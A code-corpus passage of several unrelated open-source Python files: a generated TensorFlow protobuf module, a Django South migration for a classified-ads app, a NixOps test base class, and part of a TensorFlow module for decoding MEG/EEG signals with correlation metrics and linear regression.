# source: tensorflow/core/framework/op_gen_overrides.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from tensorflow.core.framework import attr_value_pb2 as tensorflow_dot_core_dot_framework_dot_attr__value__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='tensorflow/core/framework/op_gen_overrides.proto',
package='tensorflow',
syntax='proto3',
serialized_pb=_b('\n0tensorflow/core/framework/op_gen_overrides.proto\x12\ntensorflow\x1a*tensorflow/core/framework/attr_value.proto\"\xa7\x03\n\rOpGenOverride\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0c\n\x04skip\x18\x02 \x01(\x08\x12\x0c\n\x04hide\x18\x03 \x01(\x08\x12\x11\n\trename_to\x18\x04 \x01(\t\x12\r\n\x05\x61lias\x18\x05 \x03(\t\x12;\n\x0c\x61ttr_default\x18\x06 \x03(\x0b\x32%.tensorflow.OpGenOverride.AttrDefault\x12\x35\n\x0b\x61ttr_rename\x18\x07 \x03(\x0b\x32 .tensorflow.OpGenOverride.Rename\x12\x36\n\x0cinput_rename\x18\x08 \x03(\x0b\x32 .tensorflow.OpGenOverride.Rename\x12\x37\n\routput_rename\x18\t \x03(\x0b\x32 .tensorflow.OpGenOverride.Rename\x1a\x41\n\x0b\x41ttrDefault\x12\x0c\n\x04name\x18\x01 \x01(\t\x12$\n\x05value\x18\x02 \x01(\x0b\x32\x15.tensorflow.AttrValue\x1a\"\n\x06Rename\x12\x0c\n\x04\x66rom\x18\x01 \x01(\t\x12\n\n\x02to\x18\x02 \x01(\t\"7\n\x0eOpGenOverrides\x12%\n\x02op\x18\x01 \x03(\x0b\x32\x19.tensorflow.OpGenOverrideb\x06proto3')
,
dependencies=[tensorflow_dot_core_dot_framework_dot_attr__value__pb2.DESCRIPTOR,])
_OPGENOVERRIDE_ATTRDEFAULT = _descriptor.Descriptor(
name='AttrDefault',
full_name='tensorflow.OpGenOverride.AttrDefault',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='tensorflow.OpGenOverride.AttrDefault.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='tensorflow.OpGenOverride.AttrDefault.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=431,
serialized_end=496,
)
_OPGENOVERRIDE_RENAME = _descriptor.Descriptor(
name='Rename',
full_name='tensorflow.OpGenOverride.Rename',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='from', full_name='tensorflow.OpGenOverride.Rename.from', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='to', full_name='tensorflow.OpGenOverride.Rename.to', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=498,
serialized_end=532,
)
_OPGENOVERRIDE = _descriptor.Descriptor(
name='OpGenOverride',
full_name='tensorflow.OpGenOverride',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='tensorflow.OpGenOverride.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='skip', full_name='tensorflow.OpGenOverride.skip', index=1,
number=2, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='hide', full_name='tensorflow.OpGenOverride.hide', index=2,
number=3, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='rename_to', full_name='tensorflow.OpGenOverride.rename_to', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='alias', full_name='tensorflow.OpGenOverride.alias', index=4,
number=5, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='attr_default', full_name='tensorflow.OpGenOverride.attr_default', index=5,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='attr_rename', full_name='tensorflow.OpGenOverride.attr_rename', index=6,
number=7, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='input_rename', full_name='tensorflow.OpGenOverride.input_rename', index=7,
number=8, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='output_rename', full_name='tensorflow.OpGenOverride.output_rename', index=8,
number=9, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_OPGENOVERRIDE_ATTRDEFAULT, _OPGENOVERRIDE_RENAME, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=109,
serialized_end=532,
)
_OPGENOVERRIDES = _descriptor.Descriptor(
name='OpGenOverrides',
full_name='tensorflow.OpGenOverrides',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='op', full_name='tensorflow.OpGenOverrides.op', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=534,
serialized_end=589,
)
_OPGENOVERRIDE_ATTRDEFAULT.fields_by_name['value'].message_type = tensorflow_dot_core_dot_framework_dot_attr__value__pb2._ATTRVALUE
_OPGENOVERRIDE_ATTRDEFAULT.containing_type = _OPGENOVERRIDE
_OPGENOVERRIDE_RENAME.containing_type = _OPGENOVERRIDE
_OPGENOVERRIDE.fields_by_name['attr_default'].message_type = _OPGENOVERRIDE_ATTRDEFAULT
_OPGENOVERRIDE.fields_by_name['attr_rename'].message_type = _OPGENOVERRIDE_RENAME
_OPGENOVERRIDE.fields_by_name['input_rename'].message_type = _OPGENOVERRIDE_RENAME
_OPGENOVERRIDE.fields_by_name['output_rename'].message_type = _OPGENOVERRIDE_RENAME
_OPGENOVERRIDES.fields_by_name['op'].message_type = _OPGENOVERRIDE
DESCRIPTOR.message_types_by_name['OpGenOverride'] = _OPGENOVERRIDE
DESCRIPTOR.message_types_by_name['OpGenOverrides'] = _OPGENOVERRIDES
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
OpGenOverride = _reflection.GeneratedProtocolMessageType('OpGenOverride', (_message.Message,), dict(
AttrDefault = _reflection.GeneratedProtocolMessageType('AttrDefault', (_message.Message,), dict(
DESCRIPTOR = _OPGENOVERRIDE_ATTRDEFAULT,
__module__ = 'tensorflow.core.framework.op_gen_overrides_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.OpGenOverride.AttrDefault)
))
,
Rename = _reflection.GeneratedProtocolMessageType('Rename', (_message.Message,), dict(
DESCRIPTOR = _OPGENOVERRIDE_RENAME,
__module__ = 'tensorflow.core.framework.op_gen_overrides_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.OpGenOverride.Rename)
))
,
DESCRIPTOR = _OPGENOVERRIDE,
__module__ = 'tensorflow.core.framework.op_gen_overrides_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.OpGenOverride)
))
_sym_db.RegisterMessage(OpGenOverride)
_sym_db.RegisterMessage(OpGenOverride.AttrDefault)
_sym_db.RegisterMessage(OpGenOverride.Rename)
OpGenOverrides = _reflection.GeneratedProtocolMessageType('OpGenOverrides', (_message.Message,), dict(
DESCRIPTOR = _OPGENOVERRIDES,
__module__ = 'tensorflow.core.framework.op_gen_overrides_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.OpGenOverrides)
))
_sym_db.RegisterMessage(OpGenOverrides)
try:
# THESE ELEMENTS WILL BE DEPRECATED.
# Please use the generated *_pb2_grpc.py files instead.
import grpc
from grpc.beta import implementations as beta_implementations
from grpc.beta import interfaces as beta_interfaces
from grpc.framework.common import cardinality
from grpc.framework.interfaces.face import utilities as face_utilities
except ImportError:
pass
# @@protoc_insertion_point(module_scope)
|
fluxcapacitor/pipeline
|
libs/pipeline_model/tensorflow/core/framework/op_gen_overrides_pb2.py
|
Python
|
apache-2.0
| 10,908
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Ad'
db.create_table(u'polyclassifiedads_ad', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('author', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True, blank=True)),
('secret_key', self.gf('django.db.models.fields.CharField')(max_length=128)),
('creation_date', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('last_modification_date', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('online_date', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('offline_date', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('is_validated', self.gf('django.db.models.fields.BooleanField')(default=False)),
('is_deleted', self.gf('django.db.models.fields.BooleanField')(default=False)),
('title', self.gf('django.db.models.fields.CharField')(max_length=255)),
('content', self.gf('django.db.models.fields.TextField')()),
('contact_email', self.gf('django.db.models.fields.EmailField')(max_length=75)),
('contact_phone', self.gf('django.db.models.fields.TextField')(max_length=32, null=True, blank=True)),
))
db.send_create_signal(u'polyclassifiedads', ['Ad'])
# Adding M2M table for field tags on 'Ad'
m2m_table_name = db.shorten_name(u'polyclassifiedads_ad_tags')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('ad', models.ForeignKey(orm[u'polyclassifiedads.ad'], null=False)),
('adtag', models.ForeignKey(orm[u'polyclassifiedads.adtag'], null=False))
))
db.create_unique(m2m_table_name, ['ad_id', 'adtag_id'])
# Adding model 'AdTag'
db.create_table(u'polyclassifiedads_adtag', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('tag', self.gf('django.db.models.fields.CharField')(max_length=255)),
))
db.send_create_signal(u'polyclassifiedads', ['AdTag'])
def backwards(self, orm):
# Deleting model 'Ad'
db.delete_table(u'polyclassifiedads_ad')
# Removing M2M table for field tags on 'Ad'
db.delete_table(db.shorten_name(u'polyclassifiedads_ad_tags'))
# Deleting model 'AdTag'
db.delete_table(u'polyclassifiedads_adtag')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'polyclassifiedads.ad': {
'Meta': {'object_name': 'Ad'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'contact_email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'contact_phone': ('django.db.models.fields.TextField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_validated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_modification_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'offline_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'online_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'ads'", 'symmetrical': 'False', 'to': u"orm['polyclassifiedads.AdTag']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'polyclassifiedads.adtag': {
'Meta': {'object_name': 'AdTag'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'tag': ('django.db.models.fields.CharField', [], {'max_length': '255'})
}
}
complete_apps = ['polyclassifiedads']
|
PolyLAN/polyclassifiedads
|
polyclassifiedads/migrations/0001_initial.py
|
Python
|
bsd-2-clause
| 7,916
|
import os
import subprocess
import nixops.statefile
from nose import SkipTest
from tests.functional import DatabaseUsingTest
class GenericDeploymentTest(DatabaseUsingTest):
def setup(self):
super(GenericDeploymentTest, self).setup()
self.depl = self.sf.create_deployment()
self.depl.logger.set_autoresponse("y")
|
NixOS/nixops
|
tests/functional/generic_deployment_test.py
|
Python
|
lgpl-3.0
| 344
|
# Copyright 2019-2020 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TF code to decode an MEG/EEG signal.
TF models and code to predict MEG/EEG signals from their input audio features,
or vice versa.
"""
import datetime
import json
import os
from absl import logging
import numpy as np
import tensorflow.compat.v2 as tf
# User should call tf.compat.v1.enable_v2_behavior()
def pearson_correlation(x, y):
"""Compute the Pearson correlation coefficient between two tensors of data.
This routine computes a vector correlation using Tensorflow ops.
Calculation from:
https://en.wikipedia.org/wiki/Pearson_correlation_coefficient
Args:
x: one of two input arrays.
y: second of two input arrays.
Returns:
Tensor vector of correlation coefficients, one correlation per column of
data.
Note: When used as a Keras metric, the mean of this multidimensional output
is used, which is probablematic since most of the lower dimensions are close
to zero, and the mean heads towards zero. The _first and _second routines are
probably a better choice.
Note #2: Do not use this directly to evaluate the output of a CCA model. That
model concatentates both outputs into the y array, so you need to compute the
error *within* just y.
"""
# TODO should this be a tf.function?
assert x.shape[-1] == y.shape[-1], ('x (%s) and y (%s) do not have the same '
'final dimensionality' % (x.shape,
y.shape))
x_m = x - tf.math.reduce_mean(x, axis=0)
y_m = y - tf.math.reduce_mean(y, axis=0)
x_p = tf.math.reduce_sum(tf.math.square(x_m), axis=0)
y_p = tf.math.reduce_sum(tf.math.square(y_m), axis=0)
def positive_fcn():
res = tf.divide(tf.math.reduce_sum(tf.multiply(x_m, y_m), axis=0),
tf.multiply(tf.math.sqrt(x_p), tf.math.sqrt(y_p)))
return res
def negative_fcn():
return 0*x_m # Just to get the right size
zero_cond = tf.math.logical_or(tf.math.reduce_prod(x_p) <= 0,
tf.math.reduce_prod(y_p) <= 0)
return tf.cond(zero_cond,
negative_fcn, positive_fcn)
def pearson_correlation_first(x, y):
"""Return the correlation of the first CCA dimension."""
result = pearson_correlation(x, y)
return result[0]
def pearson_correlation_second(x, y):
"""Return the correlation of the second CCA dimension."""
result = pearson_correlation(x, y)
return result[1]
class PearsonCorrelationLoss(tf.keras.losses.Loss):
"""Implements the Pearson correlation calculation as a Keras loss.
Note, this since this is a Keras loss, this function returns the instantenous
correlation for each data point. Sum all of these values to get the full
batch correlation.
Testing: Not sure if this will train a network to converge.
"""
def call(self, x, y):
"""The actual correlation calculation. See class notes above.
Args:
x: first data array of size num_frames x num_features.
y: second data array of the same size as x
Returns:
A vector with num_frame individual *negative* correlations. The negative
of the correlations are returned so that this can be used as a loss.
"""
if x.shape != y.shape:
raise ValueError('Two correlation arrays must have the same size, not '
' %s vs %s.' % ((x.shape, y.shape)))
x_m = x - tf.math.reduce_mean(x, axis=0)
y_m = y - tf.math.reduce_mean(y, axis=0)
x_std = tf.math.reduce_sum(tf.math.square(x_m), axis=0)
y_std = tf.math.reduce_sum(tf.math.square(y_m), axis=0)
power = tf.sqrt(tf.multiply(x_std, y_std))
return -tf.math.reduce_sum(tf.divide(tf.multiply(x_m, y_m), power),
axis=-1)
class BrainModel(tf.keras.models.Model):
"""Light wrapper around Keras Model with better error checking.
This class defines several different kinds of networks (e.g. linear, CCA, and
DNN). This allows us to specialize the training process (in the case of CCA
and linear, which have deterministic algorithms.)
In addition this class makes three additions to the standard Keras Model
class.
1) The class __init__ method takes a tensorboard_dir argument, which is then
automatically added as a callback to the fit and evaluate methods.
2) The fit and evaluate methods both do additional type checking, to make
sure the dataset are compatible with the call() method, before calling the
system routines.
3) The evaluate function returns a dictionary of results (instead of a bare
list)
"""
def __init__(self, tensorboard_dir=None, **kwargs):
"""Create a BrainModel object.
Note, this class essentially serves as a shim, adding a couple of features
to the standard API. See above.
Args:
tensorboard_dir: location to dump tensorboard logs. Added to evaluate
and fit methods.
**kwargs: Any arguments supported or needed by tf.keras.models.Model
"""
if tensorboard_dir:
self._tensorboard_dir = os.path.join(
tensorboard_dir, datetime.datetime.now().strftime('%Y%m%d-%H%M%S'))
logging.info('Writing tensorboard data to %s', self._tensorboard_dir)
else:
self._tensorboard_dir = None
super(BrainModel, self).__init__(**kwargs)
@property
def tensorboard_dir(self):
return self._tensorboard_dir
def fit(self, x=None, y=None, **kwargs):
"""Train the generic model. Add the tensorboard callback if requested.
Args:
x: Data to use for training model
y: Needed for compatibility with the super class, but should always be
None, since the dataset supplies inputs and outputs.
**kwargs: Extra arguments to pass to the main fit method
Returns:
A dictionary of training statistics, created by zipping the original
results and the metric names into a single dictionary.
"""
if not isinstance(x, tf.data.Dataset) and 'input_1' not in x:
raise TypeError('BrainModel.train must be called with tf.data.Dataset '
'object, not %s' % x)
if y is not None:
raise ValueError('Y value not needed, should be part of dataset.')
if self._tensorboard_dir:
if 'callbacks' in kwargs:
kwargs['callbacks'].append(
tf.keras.callbacks.TensorBoard(log_dir=self._tensorboard_dir))
else:
kwargs['callbacks'] = [
tf.keras.callbacks.TensorBoard(log_dir=self._tensorboard_dir),]
history = super(BrainModel, self).fit(x, **kwargs)
logging.info('Training a %s model returned these metrics: %s',
self, history)
return history
def evaluate(self, x=None, y=None, epoch_count=1, **kwargs):
"""Evaluate a model using a sample dataset.
The dataset should provide a tuple:
just the input and output tensors (no dictionary)
This method is a shim, automatically adding the tensorboard callback and
reformatting the results into a dictionary (instead of an unlabeled list
of losses.)
Args:
x: data to use for evaluation (a tf.data.Dataset)
y: An empty argument, to retain compatibility with the superclass
epoch_count: How many epochs have we trained on so far, for reporting.
**kwargs: Extra arguments to pass to the super class.
Returns:
A dictionary of results.
"""
logging.info('Evaluating with the %s dataset.', x)
if not isinstance(x, tf.data.Dataset):
raise TypeError('BrainModel.evaluate must be called with tf.data.Dataset'
' object.')
if self._tensorboard_dir:
if 'callbacks' in kwargs:
kwargs['callbacks'].append(
tf.keras.callbacks.TensorBoard(
log_dir=self._tensorboard_dir+'/test'))
else:
kwargs['callbacks'] = [tf.keras.callbacks.TensorBoard(
log_dir=self._tensorboard_dir+'/test'),]
results = super(BrainModel, self).evaluate(x, **kwargs)
logging.info('Evaluate names are: %s', self.metrics_names)
logging.info('Evaluate results are: %s', results)
if not isinstance(results, list):
results = [results,]
metrics = dict(zip(self.metrics_names, results))
if self._tensorboard_dir:
# Add our own summary statistics so we can see them in Tensorboard.
logdir = os.path.join(self._tensorboard_dir, 'results')
writer = tf.summary.create_file_writer(logdir=logdir)
with writer.as_default():
for name, val in metrics.items():
tf.summary.scalar(name, val, step=epoch_count)
return metrics
def add_metadata(self, flags, dataset=None):
"""Add data to the model so it will be saved with the model.
Data can be in any format, but it probably makes the most sense for it to
be a dictionary.
Args:
flags: parameters to add, probably a dictionary of flag values.
dataset: Optional dataset from which to infer the input & output sizes
"""
# Must use variable here, not constant, in order for the value to be
# saved in the model.
self.telluride_metadata = tf.Variable(json.dumps(flags))
if not dataset:
return
if not isinstance(dataset, tf.data.Dataset):
raise TypeError('dataset parameter must be tf.data.Dataset type.')
for data in dataset.take(1):
inputs, output = data
for k in inputs:
inputs[k] = list(inputs[k].shape)
output = list(output.shape)
self.telluride_inputs = tf.Variable(json.dumps(inputs))
self.telluride_output = tf.Variable(json.dumps(output))
def add_tensorboard_summary(self, name, data, subdir='train', step=0):
"""Adds a scalar event to the tensorboard data.
Args:
name: Name of the variable or event, a string.
data: A scalar value associated with the variable.
subdir: A string indicating the sub directory to store the event.
step: Which time step to associate with the result.
"""
if not isinstance(name, str):
raise TypeError('Tensorboard name must be a string, not a %s.' %
type(name))
if not isinstance(subdir, str):
raise TypeError('Tensorboard subdir must be a string, not a %s.' %
type(subdir))
if self._tensorboard_dir:
logdir = os.path.join(self._tensorboard_dir, subdir)
writer = tf.summary.create_file_writer(logdir=logdir)
with writer.as_default():
tf.summary.text(name, str(data), step=step)
######################### Create Linear Regressor ###########################
class BrainModelLinearRegression(BrainModel):
"""A linear regression class, computed deterministically from the input data.
Implemented as a single dense layer. Use regularization when computing the
optimum weights.
"""
def __init__(self, input_dataset, regularization_lambda=0.0,
tensorboard_dir=None, **kwargs):
"""Create a LinearRegression model.
Args:
input_dataset: data used to figure out the network sizes
regularization_lambda: amount of regularization to perform when computing
the best model.
tensorboard_dir: Where to store data for Tensorboard
**kwargs: Arguments that are ignore and simply passed to the super class.
"""
super(BrainModelLinearRegression, self).__init__(
tensorboard_dir=tensorboard_dir, **kwargs)
if not isinstance(input_dataset, tf.data.Dataset):
raise ValueError('Dataset must be a tf.data.datasert, not a %s' %
type(input_dataset))
self._input_width = input_dataset.element_spec[0]['input_1'].shape[-1]
self._output_width = input_dataset.element_spec[1].shape[-1]
self._regularization_lambda = regularization_lambda
self._input_1 = tf.keras.Input(shape=self._input_width,
name='input_1')
self._layer = tf.keras.layers.Dense(self._output_width, activation=None,
use_bias=True, trainable=True,
kernel_initializer=None,
bias_initializer=None)
def call(self, input_dataset):
return self._layer(input_dataset['input_1'])
def compile(self, optimizer=tf.keras.optimizers.RMSprop,
loss='mse',
metrics=pearson_correlation_first,
learning_rate=1e-3, **kwargs):
"""Compile this model, applying the usual defaults for this classifier.
Args:
optimizer: Which Keras optimizer to use when training.
loss: How do we normally define the performance (loss) of the network.
metrics: Which metric(s) do we report after training.
learning_rate: A learning rate to pass to the optimizer
**kwargs: Arguments that are simply passed to the super class' compile().
"""
if callable(optimizer):
optimizer = optimizer(learning_rate=learning_rate)
super(BrainModelLinearRegression, self).compile(
optimizer=optimizer, loss=loss, metrics=metrics, **kwargs)
def fit(self, input_dataset, **kwargs):
"""Do our own training since optimal parameters can be calculated."""
del kwargs # Not needed here since we only need to read the data once.
if not isinstance(input_dataset, tf.data.Dataset):
raise TypeError('BrainModelLinearRegression.train must be called with '
'tf.data.Dataset, not %s.' % type(input_dataset))
(self.w_estimate, self.b_estimate, _, _,
_) = calculate_linear_regressor_parameters_from_dataset(
input_dataset, lamb=self._regularization_lambda)
self.b_estimate = np.reshape(self.b_estimate, (-1,))
# Need to call the function once to build the network.
for input_data, _ in input_dataset:
self.call(input_data)
self._layer.set_weights([self.w_estimate, self.b_estimate])
return {} # No training history
@property
def weight_matrices(self):
return self._layer.get_weights()
def calculate_linear_regressor_parameters_from_dataset(dataset, lamb=0.1,
use_offset=True,
use_ridge=True):
"""Estimate the parameters for a linear regressor from a dataset.
Finds A to solve the equation:
Ax = y
This routine reads the dataset, calculating the necessary covariances, and
then returns the solution A to the equation above. Use these values to preload
a linear regressor estimator.
Regression calculation defined here:
https://stackoverflow.com/questions/45959112/get-coefficients-of-a-linear-regression-in-tensorflow
Note, lambda in this routine corresponds to the shrinkage parameter gamma
in Blankertz et al. NeuroImage 58 (2011) 814-825, specificially used in Eq 13.
Args:
dataset: The tf.dataset from which to read data (dictionary item 'input_1'
and labels). Dataset is read once (so be sure repeat=1)
lamb: Regularization parameters for the least squares estimates.
use_offset: Whether to include the additive bias offset
use_ridge: Use ridge regression, instead of shrinkage for regularization.
Returns:
The estimated A and b matrices. As well as the two covariance matrices for
debugging, and the optimal shrinkage parameter.
Raises:
ValueError and/or TypeError for bad parameter values.
Automatic regularization (when lamb == -1) based on this paper:
http://perso.ens-lyon.fr/patrick.flandrin/LedoitWolf_JMA2004.pdf
"""
if not isinstance(dataset, tf.data.Dataset):
raise TypeError('dataset input to '
'calculate_linear_regressor_parameters_from_database must '
'be a tf.data.Dataset object')
sum_x = 0.0
sum_xtx = 0.0
sum_x2tx2 = 0 # Accumulate sum of x2^T x2 for all minibatches
sum_xty = 0 # Accumulate sum of x^T y for all minibatches
num_mini_batches = 0
num_samples = 0 # Total number of samples
for x, y in dataset:
x = x['input_1'].numpy()
y = y.numpy()
num_rows = x.shape[0]
num_samples += num_rows
if use_offset:
# Append a column of 1's so we can compute an offset.
x = np.hstack((x, np.ones((num_rows, 1), dtype=x.dtype)))
sum_xtx += np.matmul(x.T, x)
sum_x += np.sum(x, axis=0, keepdims=True)
sum_xty += np.matmul(x.T, y)
if lamb == -1:
xc = x - sum_x/num_samples
x2 = xc ** 2
sum_x2tx2 += np.matmul(x2.T, x2)
num_mini_batches += 1
logging.info('Calculate_linear_regressor_parameters_from_dataset: Processed '
'%d minibatches of size %d', num_mini_batches, num_rows)
cov_x = sum_xtx / num_samples
cov_xy = sum_xty / num_samples
mean_x = sum_x/num_samples
cov_x_zc = sum_xtx - np.matmul(mean_x.T, mean_x) # pytype: disable=attribute-error
n_col = cov_x.shape[0] # pytype: disable=attribute-error
mu = np.trace(cov_x_zc) / n_col
if use_ridge:
cov_x += lamb * np.identity(n_col)
shrinkage = lamb
else:
if lamb == -1:
cov_x2 = sum_x2tx2 / num_samples
delta_ = cov_x_zc.copy()
delta_.flat[::n_col + 1] -= mu
delta = (delta_**2).sum() / n_col
beta_ = 1. / (n_col * num_samples) \
